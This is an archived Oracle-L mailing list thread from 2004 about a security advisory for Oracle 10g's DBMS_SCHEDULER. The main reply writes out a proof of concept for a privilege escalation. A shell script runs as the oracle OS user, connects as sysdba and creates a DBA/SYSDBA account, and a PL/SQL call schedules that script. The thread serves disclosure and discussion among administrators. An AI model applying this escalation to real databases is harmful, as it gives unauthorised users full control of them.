| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> RE: PeteFinnigan.com Oracle advisory for bugs in dbms_scheduler ( alert #68)
What annoys me the most is that the bug is so trivial
that it should have been discovered during the beta test.
You and Pete didn't specify how exactly is it possible, probably
out of the goodness of your heart, so I did a little investigation
of my own, and discovered that Oracle10g alows shell scripts to
be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
uses job queue processes owned by user oracle to schedule those
shell scripts. The thing that can be done is to schedule a shell
script containing the following sequence:
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering?">/dev/console
ORAENV_ASK=NO
ORACLE_SID=<sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba"<<EOF
create user brain identified by takeover
default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF
If this script is executed by a process owned by user "oracle",
"connect / as sysdba" will succeed. The database is mine.
All you need to do is it to run something like this:
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name => 'take_over_the_world', program_action => '/tmp/pinky_and_the_brain', program_type => 'EXECUTABLE', comments => 'I rulez');END;
and you are ready to create the job and run it. I was astonished how simple and trivial the flaw is. Someone should have thought of that during beta testing. Now, let me put on a wide smile and ask: is that the bug that you and Pete have found?
-- Mladen Gogala Oracle DBA email:mladeng_at_aetvn.com Ext: 9787Received on Thu Sep 02 2004 - 15:58:04 CDT
> -----Original Message-----
> From: Jonathan Gennick [mailto:jonathan_at_gennick.com]
> Sent: Thursday, September 02, 2004 8:33 AM
> To: Pete Finnigan
> Cc: oracle-l_at_freelists.org
> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
> dbms_scheduler (alert #68)
>
>
> This alert apparently covers several flaws. I'm actually
> taken-aback by how long it's taken Oracle to respond to the
> one Pete and I uncovered back in March, which let's you
> leverage the new scheduler to gain access to the Oracle user,
> and thence to grant yourself DBA privileges.
>
> Best regards,
>
> Jonathan Gennick --- Brighten the corner where you are
http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com Join the Oracle-article list and receive one article on Oracle technologies per month by email. To join, visit http://five.pairlist.net/mailman/listinfo/oracle-article, or send email to Oracle-article-request_at_gennick.com and include the word "subscribe" in either the subject or body. Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan (oracle_list_at_peterfinnigan.demon.co.uk) wrote: PF> Hi everyone, PF> Oracle released last night alert #68 covering fixes for many PF> security bugs in Oracle. PeteFinnigan.com found security bugs in the PF> new 10gR1 scheduler functionality. Our security advisory can be PF> found at http://www.petefinnigan.com/alerts.htm PF> Kind regards PF> Pete --- To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe To read recent messages - http://freelists.org/archives/oracle-l/09-2004 --- To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe To read recent messages - http://freelists.org/archives/oracle-l/09-2004
 |
 |